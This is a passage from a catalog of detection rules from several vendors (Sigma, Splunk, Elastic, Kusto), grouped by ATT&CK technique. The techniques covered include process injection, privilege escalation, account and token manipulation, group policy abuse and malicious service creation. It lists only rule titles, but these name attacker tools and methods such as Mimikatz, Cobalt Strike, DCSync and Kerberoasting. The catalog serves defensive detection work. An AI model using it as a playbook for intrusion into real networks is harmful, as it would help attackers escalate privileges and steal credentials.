- Splunk Wscript Or Cscript Suspicious Child Process production
Process Injection: Dynamic-link Library Injection T1055.001 19 rules
- Sigma CreateRemoteThread API and LoadLibrary test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Splunk Loading Of Dynwrapx Module production
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Sigma TAIDOOR RAT DLL Load test
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Rasautou DLL Execution production
Process Injection: Portable Executable Injection T1055.002 6 rules
- Kusto ADWS Connection from Process Injection Target
- Kusto Process Injection From Untrusted Process
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection With Public Source Path production
Process Injection: Thread Execution Hijacking T1055.003 3 rules
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Sigma Remote Thread Creation In Uncommon Target Image test
Process Injection: Asynchronous Procedure Call T1055.004 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Process Injection: Process Hollowing T1055.012 10 rules
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Splunk PowerShell PInvoke Process Injection API Chain production
- Elastic Suspicious Endpoint Security Parent Process production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Uncommon Svchost Command Line Parameter experimental
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
Process Injection: Process Doppelgänging T1055.013 1 rule
- Splunk PowerShell PInvoke Process Injection API Chain production
Exploitation for Privilege Escalation T1068 62 rules
- Sigma Audit CVE Event test
- Splunk Child Processes of Spoolsv exe experimental
- Sigma Computer account created with privileges experimental
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Consent.exe Suspicious Child Process (Sysmon)
- Splunk Consent.exe Suspicious Child Process (Windows Event Log)
- Elastic Deprecated - Suspicious PrintSpooler Service Executable File Creation production
- Splunk Driver as Command Parameter (Windows Event Log)
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Kusto Email access via active sync
- Splunk Executable Running as NT AUTHORITY_SYSTEM Registered in BAM (Sysmon)
- Splunk Executable Running as NT AUTHORITY_SYSTEM Registered in BAM (Windows Event Log)
- Elastic Expired or Revoked Driver Loaded production
- Sigma Exploiting CVE-2019-1388 stable
- Sigma Exploiting SetupComplete.cmd CVE-2019-1378 test
- Splunk First Time Seen Child Process of Zoom experimental
- YARA-L Hacktool - SharpSuccessor Execution
- Sigma HackTool - SysmonEOP Execution test
- Sigma HKTL - SharpSuccessor Privilege Escalation Tool Execution experimental
- Sigma InstallerFileTakeOver LPE CVE-2021-41379 File Create Event test
- Sigma Kerberos ticket without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Elastic Modification of the msPKIAccountCredentials production
- Sigma Non-Standard Nsswitch.Conf Creation - Potential CVE-2025-32463 Exploitation experimental
- Elastic Persistence via Update Orchestrator Service Hijack production
- Sigma Potential CVE-2021-41379 Exploitation Attempt test
- Sigma Potential CVE-2024-35250 Exploitation Activity experimental
- Elastic Potential Escalation via Vulnerable MSI Repair production
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Elastic Potential Privilege Escalation via InstallerFileTakeOver production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Sigma Potential SystemNightmare Exploitation Attempt test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Privilege SeMachineAccountPrivilege abuse experimental
- Sigma Process Explorer Driver Creation By Non-Sysinternals Binary test
- Sigma Process Monitor Driver Creation By Non-Sysinternals Binary test
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Spoolsv Suspicious Process Access production
- Sigma Sudo Privilege Escalation CVE-2019-14287 test
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Sigma Suspicious Kerberos proxiable/S4U2self ticket (CVE-2021-42278/42287) experimental
- Elastic Suspicious Print Spooler File Deletion production
- Elastic Suspicious Print Spooler Point and Print DLL production
- Sigma Suspicious Spool Service Child Process test
- Sigma Suspicious Sysmon as Execution Parent test
- Elastic Unusual Print Spooler Child Process production
- Sigma Vulnerable Driver Load test
- Sigma Vulnerable Driver Load By Name test
- Splunk Windows Driver Load Non-Standard Path production
- Splunk Windows Drivers Loaded by Signature production
- Splunk Windows MSI Rollback Script Deleted By Non-Msiexec Process production
- Splunk Windows Potato Privilege Escalation Tool Execution production
- Splunk Windows Privilege Escalation Attempt Via MSI Rollback production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Windows Remote Image Load production
- Splunk Windows Service Create Kernel Mode Driver production
- Splunk Windows System File on Disk production
- Splunk ZeroLogon CVE-2020-1472 (Windows Event Log)
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Account Manipulation T1098 113 rules
- Sigma A Member Was Added to a Security-Enabled Global Group stable
- Sigma A Member Was Removed From a Security-Enabled Global Group stable
- Sigma A New Trust Was Created To A Domain stable
- Sigma A Security-Enabled Global Group Was Deleted stable
- Kusto Account added and removed from privileged groups
- Elastic Account Configured with Never-Expiring Password production
- Sigma Account marked as sensitive and cannot be delegated had its protection removed (weakness introduction) experimental
- Elastic Account Password Reset Remotely production
- Sigma Account password set to never expire. experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account set with Kerberos DES encryption activated (weakness introduction) experimental
- Sigma Account set with Kerberos pre-authentication not required (AS-REP Roasting) experimental
- Sigma Account set with password not required (weakness introduction) experimental
- Sigma Account set with reversible encryption (weakness introduction) experimental
- Elastic Active Directory Group Modification by SYSTEM production
- Sigma Active Directory User Backdoors test
- Kusto AD account with Don't Expire Password
- Kusto AD user enabled and password not set within 48 hours available
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Computer account created with privileges experimental
- Sigma Computer account manipulation for delegation (RBCD) experimental
- Sigma Computer account renamed without a trailing $ (CVE-2021-42278/42287) experimental
- Splunk Create_Add Local_Domain User (EDR)
- Splunk Create_Add Local_Domain User (Sysmon)
- Splunk Create_Add Local_Domain User (Windows Event Log)
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Kusto DEV-0270 New User Creation available
- Sigma Disabled guest or builtin account activated experimental
- Sigma Disabled guest or builtin account activated (command)
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Sigma Domain group membership change experimental
- Kusto DSRM Account Abuse
- Sigma DSRM password changed (native) experimental
- Sigma DSRM password changed (Reg via command) experimental
- Sigma DSRM password changed (Reg via PowerShell) experimental
- Sigma Enabled User Right in AD to Control User Objects test
- Kusto Group created then added to built in domain local or global group
- Sigma Hidden account creation (with fast deletion) experimental
- Sigma High risk Active Directory group membership change experimental
- Sigma High risk local/domain local group membership change experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Any protocol experimental
- Sigma Host constrained delegation settings changed for potential abuse (Rubeus) - Kerberos only experimental
- Sigma Host set with constrained delegation experimental
- Sigma Host set with unconstrained delegation experimental
- Sigma Host unconstrained delegation settings changed for potential abuse (Rubeus) experimental
- Elastic Kerberos Pre-authentication Disabled for User production
- Elastic KRBTGT Delegation Backdoor production
- Kusto Local Admin Group Changes available
- Sigma Local group membership change experimental
- Sigma Medium risk Active Directory group membership change experimental
- Sigma Medium risk local/domain local group membership change experimental
- Sigma Member added to DNSadmin group experimental
- Splunk Member added to security-enabled global group (Windows Event Log)
- Elastic Modification of the msPKIAccountCredentials production
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (low risk) experimental
- Sigma New member added to a "OCS/Lync/Skype for Business" administration group (medium risk) experimental
- Sigma New member added to an "OCS/Lync/Skype for Business" administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (high risk) experimental
- Sigma New member added to an Exchange administration group (medium risk) experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Change on Directory Service Restore Mode (DSRM) Account stable
- Sigma Password Set to Never Expire via WMI experimental
- Elastic Potential Active Directory Replication Account Backdoor production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Powershell LocalAccount Manipulation test
- Sigma Powerview Add-DomainObjectAcl DCSync AD Extend Right test
- Sigma Privilege SeMachineAccountPrivilege abuse experimental
- Elastic Sensitive Privilege SeEnableDelegationPrivilege assigned to a Principal production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma SPN added to an account by command line experimental
- Sigma Suspicious Computer Account Name Change CVE-2021-42287 test
- Sigma Suspicious modification of a computer account SPN experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) experimental
- Sigma Suspicious modification of a fake domain controller SPN (DCshadow) (Directory Services) experimental
- Sigma Suspicious modification of a user account SPN to enable Kerberoast attack experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Sigma User account creation disguised in a computer account experimental
- Kusto User account enabled and disabled within 10 mins
- Elastic User account exposed to Kerberoasting production
- Sigma User added to a group via commandline
- Sigma User Added To Highly Privileged Group test
- Sigma User Added to Local Administrator Group stable
- Sigma User Added to Local Administrators Group test
- Elastic User Added to Privileged Group in Active Directory production
- Sigma User password change using current hash password - ChangeNTLM (Mimikatz) experimental
- Sigma User password change without previous password known - SetNTLM (Mimikatz) experimental
- Splunk Windows AD add Self to Group production
- Splunk Windows AD DSRM Account Changes production
- Splunk Windows AD DSRM Password Reset production
- Splunk Windows AD Privileged Group Modification production
- Splunk Windows AD Self DACL Assignment production
- Splunk Windows AD ServicePrincipalName Added To Domain Account production
- Splunk Windows AD Short Lived Domain Account ServicePrincipalName production
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows DnsAdmins New Member Added production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Increase in Group or Object Modification Activity production
- Splunk Windows Increase in User Modification Activity production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Elastic WRITEDAC Access on Active Directory Object production
Account Manipulation: Additional Email Delegate Permissions T1098.002 1 rule
- Elastic New ActiveSyncAllowedDeviceID Added via PowerShell production
Account Manipulation: Additional Local or Domain Groups T1098.007 1 rule
- Elastic User Added to Privileged Group in Active Directory production
Access Token Manipulation T1134 49 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Addition of SID History to Active Directory Object stable
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma New rights granted to an account for privilege escalation experimental
- Elastic Parent Process PID Spoofing production
- Kusto Possible Resource-Based Constrained Delegation Abuse
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Kusto PRT Credential Stealing
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Splunk Runas Execution in CommandLine production
- Elastic SeDebugPrivilege Enabled by a Suspicious Process production
- Kusto Service Principal Name (SPN) Assigned to User Account
- Sigma Suspicious Child Process Created as System test
- Elastic Suspicious SeIncreaseBasePriorityPrivilege Use production
- Sigma Suspicious SYSTEM User Process Creation test
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Windows Privilege Escalation Suspicious Process Elevation production
- Splunk Windows Privilege Escalation System Process Without System Parent production
- Splunk Windows Privilege Escalation User Process Spawn System Process production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: Token Impersonation/Theft T1134.001 18 rules
- Sigma Anonymous login (RottenPotatoNG) experimental
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - Koh Default Named Pipe test
- Sigma HackTool - NoFilter Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Access Token Abuse test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Elastic Privilege Escalation via Named Pipe Impersonation production
- Elastic Privilege Escalation via Rogue Named Pipe Impersonation production
- Elastic Process Created with a Duplicated Token production
- Kusto PRT Credential Stealing
- Splunk Runas Execution in CommandLine production
- Splunk Windows Access Token Manipulation Winlogon Duplicate Token Handle production
- Splunk Windows Access Token Winlogon Duplicate Handle In Uncommon Path production
- Splunk Windows Handle Duplication in Known UAC-Bypass Binaries production
Access Token Manipulation: Create Process with Token T1134.002 16 rules
- Kusto Access Token Manipulation - Create Process with Token available
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - Security test
- Sigma Meterpreter or Cobalt Strike Getsystem Service Installation - System test
- Sigma Potential Meterpreter/CobaltStrike Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Privilege escalation via runas (command) experimental
- Sigma Privilege escalation via RunasCS experimental
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Process Created with a Duplicated Token production
- Elastic Process Created with an Elevated Token production
- Elastic Process Creation via Secondary Logon production
- Sigma PUA - AdvancedRun Execution test
- Sigma PUA - AdvancedRun Suspicious Execution test
- Sigma RedSun - Conhost.exe Spawned by TieringEngineService.exe experimental
- Sigma Suspicious Child Process Created as System test
- Splunk Windows Access Token Manipulation SeDebugPrivilege production
Access Token Manipulation: Make and Impersonate Token T1134.003 4 rules
- Sigma HackTool - Impersonate Execution test
- Sigma HackTool - SharpDPAPI Execution test
- Sigma HackTool - SharpImpersonation Execution test
- Elastic Process Creation via Secondary Logon production
Access Token Manipulation: Parent PID Spoofing T1134.004 6 rules
- Sigma HackTool - PPID Spoofing SelectMyParent Tool Execution test
- Elastic Parent Process PID Spoofing production
- Elastic Privileges Elevation via Parent Process PID Spoofing production
- Elastic Unusual Parent-Child Relationship production
- Splunk Windows Parent PID Spoofing with Explorer production
- Splunk Wscript Or Cscript Suspicious Child Process production
Access Token Manipulation: SID-History Injection T1134.005 6 rules
- Sigma Addition of SID History to Active Directory Object stable
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows AD Cross Domain SID History Addition production
- Splunk Windows AD Privileged Account SID History Addition production
- Splunk Windows AD Same Domain SID History Addition production
- Splunk Windows AD SID History Attribute Modified production
Domain or Tenant Policy Modification T1484 33 rules
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Kusto Shadow Credentials Added to Account
- Kusto Shadow Credentials Added to Account (Alternative)
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD Dangerous Deny ACL Modification production
- Splunk Windows AD Dangerous Group ACL Modification production
- Splunk Windows AD Dangerous User ACL Modification production
- Splunk Windows AD DCShadow Privileges ACL Addition production
- Splunk Windows AD Domain Replication ACL Addition production
- Splunk Windows AD Domain Root ACL Deletion production
- Splunk Windows AD Domain Root ACL Modification production
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Splunk Windows AD Hidden OU Creation production
- Splunk Windows AD Object Owner Updated production
- Splunk Windows AD Self DACL Assignment production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Domain or Tenant Policy Modification: Group Policy Modification T1484.001 20 rules
- Sigma Group Policy Abuse for Privilege Addition test
- Elastic Group Policy Abuse for Privilege Addition production
- Splunk Modify Group Policy (Windows Event Log)
- Sigma Modify Group Policy Settings test
- Sigma Modify Group Policy Settings - ScriptBlockLogging test
- Sigma Permissions changed on a Group Policy (GPO) experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Elastic Scheduled Task Execution at Scale via GPO production
- Sigma Startup/Logon Script Added to Group Policy Object test
- Elastic Startup/Logon Script added to Group Policy Object production
- Sigma Suspicious modification of a sensitive Group Policy (GPO) experimental
- Splunk Windows AD GPO Deleted production
- Splunk Windows AD GPO Disabled production
- Splunk Windows AD GPO New CSE Addition production
- Sigma Windows Default Domain GPO Modification experimental
- Sigma Windows Default Domain GPO Modification via GPME experimental
- Splunk Windows Default Group Policy Object Modified production
- Splunk Windows Default Group Policy Object Modified with GPME production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
Create or Modify System Process T1543 135 rules
- Sigma Allow Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Clop Ransomware Known Service Name production
- Splunk CMD Echo Pipe - Escalation production
- Sigma CobaltStrike Service Installations - Security test
- Sigma CobaltStrike Service Installations - System test
- Sigma CodeIntegrity - Blocked Driver Load With Revoked Certificate test
- Sigma CodeIntegrity - Blocked Image/Driver Load For Policy Violation test
- Kusto COM Event System Loading New DLL
- Sigma CosmicDuke Service Installation test
- Sigma Deny Service Access Using Security Descriptor Tampering Via Sc.EXE test
- Sigma Devcon Execution Disabling VMware VMCI Device experimental
- Sigma Driver Load From A Temporary Directory test
- Splunk Driver Loaded from Unusual Path - Windows (Sysmon)
- Sigma EAP service activation by Liontail framework for DLL sideloading (via command) stable
- Sigma Encoded PowerShell payload deployed via service experimental
- Splunk Impacket Lateral Movement Commandline Parameters production
- Splunk Impacket Lateral Movement smbexec CommandLine Parameters production
- Splunk Impacket Lateral Movement WMIExec Commandline Parameters production
- Sigma Impacket SMBexec service creation (registry) experimental
- Sigma Impacket SMBexec service registration (native) experimental
- Splunk Kernel Service Installed - Windows (Windows Event Log)
- Sigma KrbRelayUp Service Installation test
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Splunk LLM Model File Creation production
- Sigma Malicious Driver Load test
- Sigma Malicious Driver Load By Name test
- Sigma Mimikatz driver deployed via service experimental
- Sigma Mimikatz driver registration (Reg via Sysmon) experimental
- Sigma Moriya Rootkit - System test
- Sigma Moriya Rootkit File Created test
- Elastic Network Logon Provider Registry Modification production
- Sigma New Kernel Driver Via SC.EXE test
- Sigma New PDQDeploy Service - Client Side test
- Sigma New PDQDeploy Service - Server Side test
- Sigma New Service Creation Using PowerShell test
- Sigma New Service Creation Using Sc.EXE test
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Persistence via Update Orchestrator Service Hijack production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Possible impact of 'SMOKEDHAM backdoor' with MSDTC service privilege escalation via command line production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential CobaltStrike Service Installations - Registry test
- Sigma Potential Persistence Attempt Via Existing Service Tampering test
- Elastic Potential Privilege Escalation via Service ImagePath Modification production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma ProcessHacker Privilege Elevation test
- Sigma PSEXEC Remote Execution File Artefact test
- Splunk PSexec Service Creation (Windows Event Log)
- Sigma PSexec service installation experimental
- Sigma PUA - Kernel Driver Utility (KDU) Execution experimental
- Sigma PUA - Process Hacker Driver Load test
- Sigma PUA - Process Hacker Execution test
- Sigma PUA - System Informer Driver Load test
- Sigma PUA - System Informer Execution test
- Splunk Randomly Generated Windows Service Name experimental
- Kusto Rare Process as a Service available
- Sigma RDP session hijack via service creation abuse experimental
- Sigma Remote Access Tool Services Have Been Installed - Security test
- Sigma Remote Access Tool Services Have Been Installed - System test
- Elastic Remote Windows Service Installed production
- Sigma Service abuse with backdoored "command failure" (Reg via command) experimental
- Sigma Service abuse with backdoored "command failure" (Reg via PowerShell) experimental
- Sigma Service abuse with backdoored "command failure" (service) experimental
- Sigma Service abuse with malicious ImagePath (Reg via PowerShell) experimental
- Sigma Service abuse with malicious ImagePath (service) experimental
- Elastic Service Command Lateral Movement production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Service creation (command) experimental
- Sigma Service creation (PowerShell) experimental
- Elastic Service Creation via Local Kerberos Authentication production
- Elastic Service DACL Modification via sc.exe production
- Sigma Service Installation in Suspicious Folder test
- Sigma Service Installation with Suspicious Folder Pattern test
- Splunk Service Installed (Windows Event Log)
- Sigma Service Installed By Unusual Client - Security test
- Sigma Service Installed By Unusual Client - System test
- Elastic Service Path Modification production
- Sigma Service permissions hijacked for privileges abuse (PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (reg via command) experimental
- Sigma Service permissions hijacked for privileges abuse (Reg via PowerShell) experimental
- Sigma Service permissions hijacked for privileges abuse (service) experimental
- Sigma ServiceDll Hijack test
- Splunk Services LOLBAS Execution Process Spawn production
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Sigma Sliver C2 Default Service Installation test
- Sigma StoneDrill Service Install test
- Kusto SUNBURST suspicious SolarWinds child processes (Normalized Process Events)
- Splunk Suspicious .sys Created - Windows (Sysmon)
- Elastic Suspicious ImagePath Service Creation production
- Sigma Suspicious New Service Creation test
- Splunk Suspicious PlistBuddy Usage experimental
- Elastic Suspicious ScreenConnect Client Child Process production
- Sigma Suspicious Service DACL Modification Via Set-Service Cmdlet test
- Sigma Suspicious Service Installation test
- Sigma Suspicious Service Installation Script test
- Sigma Suspicious Service Path Modification test
- Elastic Suspicious Service was Installed in the System production
- YARA-L Suspicious Windows Service Installation Detected
- Sigma Sysinternals PsService Execution test
- Sigma Sysinternals PsSuspend Execution test
- Elastic System Shells via Services production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
